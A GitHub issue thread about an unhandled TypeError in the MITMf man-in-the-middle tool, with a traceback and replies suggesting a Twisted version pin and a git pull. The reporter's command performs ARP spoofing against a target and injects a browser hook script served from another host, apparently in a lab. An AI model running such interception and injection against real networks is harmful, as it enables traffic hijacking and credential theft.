### ISSUE TITLE
Mitmf unhandled error

### ISSUE THREAD

**Issue by RamziMD5** [byt3bl33d3r/MITMf#313]
I am running mimtf in Kali Linux 2016.1
I am using the version : MITMf v0.9.8
that i downloaded from github and done all the installations needed and i get this error when i try to inject a hook into the browser 

root@kali:~/Tools/MITMf# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.202.2 --target 192.168.202.130 --inject --js-url http://192.168.202.129:3000/hook.js

@@@@@@@@@@   @@@  @@@@@@@  @@@@@@@@@@   @@@@@@@@  
@@@@@@@@@@@  @@@  @@@@@@@  @@@@@@@@@@@  @@@@@@@@  
@@! @@! @@!  @@!    @@!    @@! @@! @@!  @@!       
!@! !@! !@!  !@!    !@!    !@! !@! !@!  !@!       
@!! !!@ @!@  !!@    @!!    @!! !!@ @!@  @!!!:!    
!@!   ! !@!  !!!    !!!    !@!   ! !@!  !!!!!:    
!!:     !!:  !!:    !!:    !!:     !!:  !!:       
:!:     :!:  :!:    :!:    :!:     :!:  :!:       
:::     ::    ::     ::    :::     ::    ::       
 :      :    :       :      :      :     :        

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

Unhandled Error
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 602, in _doReadOrWrite
    why = selectable.doWrite()
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 587, in doConnect
    self._connectDone()
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 616, in _connectDone
    self.protocol.makeConnection(self)
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/protocol.py", line 494, in makeConnection
    self.connectionMade()
  File "/root/Tools/MITMf/core/sslstrip/ServerConnection.py", line 108, in connectionMade
    user_agent = parse(self.headers['user-agent'])
  File "/usr/local/lib/python2.7/dist-packages/user_agents/parsers.py", line 226, in parse
    return UserAgent(user_agent_string)
  File "/usr/local/lib/python2.7/dist-packages/user_agents/parsers.py", line 129, in __init__
    self.device = parse_device(**ua_dict['device'])
exceptions.TypeError: parse_device() takes exactly 3 arguments (1 given)

Unhandled Error
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 602, in _doReadOrWrite
    why = selectable.doWrite()
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 587, in doConnect
    self._connectDone()
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 616, in _connectDone
    self.protocol.makeConnection(self)
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/protocol.py", line 494, in makeConnection
    self.connectionMade()
  File "/root/Tools/MITMf/core/sslstrip/ServerConnection.py", line 108, in connectionMade
    user_agent = parse(self.headers['user-agent'])
  File "/usr/local/lib/python2.7/dist-packages/user_agents/parsers.py", line 226, in parse
    return UserAgent(user_agent_string)
  File "/usr/local/lib/python2.7/dist-packages/user_agents/parsers.py", line 129, in __init__
    self.device = parse_device(**ua_dict['device'])
exceptions.TypeError: parse_device() takes exactly 3 arguments (1 given)

**Comment by jakuta-tech** [comment]
`pip install Twisted==15.5.0`

**Comment by RamziMD5** [comment]
I have Twisted installed 
Requirement already satisfied
Requirement already up-to-date

**Comment by byt3bl33d3r** [comment]
@RamziMD5 Do a git pull and try again, This might have been fixed in the latest update. If not comment below.
